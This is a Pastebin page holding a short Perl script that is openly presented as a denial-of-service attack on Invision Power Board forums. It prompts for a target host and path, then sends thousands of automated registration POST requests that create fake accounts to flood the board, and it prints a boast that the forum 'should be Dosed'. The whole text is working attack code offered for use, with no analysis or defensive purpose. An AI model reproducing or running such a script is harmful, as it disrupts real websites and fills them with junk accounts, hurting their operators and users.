Advertisement
Guest User

Untitled

a guest
Sep 13th, 2017
94
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
Perl 1.56 KB | None | 0 0
  1. #!/usr/bin/perl
  2. use IO::Socket;
  3. ##########################################################
  4. ##IPB Register Multiple Users Denial of Service      #
  5. ##Doesn't Work on forums using "Code Confirmation"   #
  6. ##Created By cap`nhooba                                        #
  7. ##Nope.                                      #
  8. ##########################################################
  9.  
  10. print q{
  11. ############################################################
  12. #        Invision Power Board Multiple Users DOS       #
  13. #       Tested on IPB 2.0.1            #
  14. #       created By cap`nhooba. Nope. Stare into the eyes of the hooba face.            #
  15. ############################################################
  16. };
  17. $rand=rand(10);
  18. print "Forum Host: ";
  19. $serv = <stdin>;
  20. chop ($serv);
  21. print "Forum Path: ";
  22. $path = <stdin>;
  23. chop ($path);
  24. for ($i=0; $i<9999; $i++)
  25. {
  26. $name="sedXPL_".$rand.$i;
  27. $data = "act=Reg&CODE=02&coppa_user=0&UserName=".$name."&PassWord=sedbotbeta&PassWord_Check=sedbotbeta&EmailAddress=".$name."\@host.com&EmailAddress_two=".$name."\@host.com&allow_admin_mail=1&allow_member_mail=1&day=11&month=11&year=1985&agree=1";
  28. $len = length $data;
  29. $get1 = IO::Socket::INET->new( Proto => "tcp", PeerAddr => "$serv", PeerPort => "80") || die "Cennot Connect Host, it's can be beacuse the host dosed";
  30. print $get1 "POST ".$path."index.php HTTP/1.0\n";
  31. print $get1 "Host: ".$serv."\n";
  32. print $get1 "Content-Type: application/x-www-form-urlencoded\n";
  33. print $get1 "Content-Length: ".$len."\n\n";
  34. print $get1 $data;
  35. syswrite STDOUT, "+";
  36. }
  37. print "Forum shuld be Dosed. Check it out...\n";
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement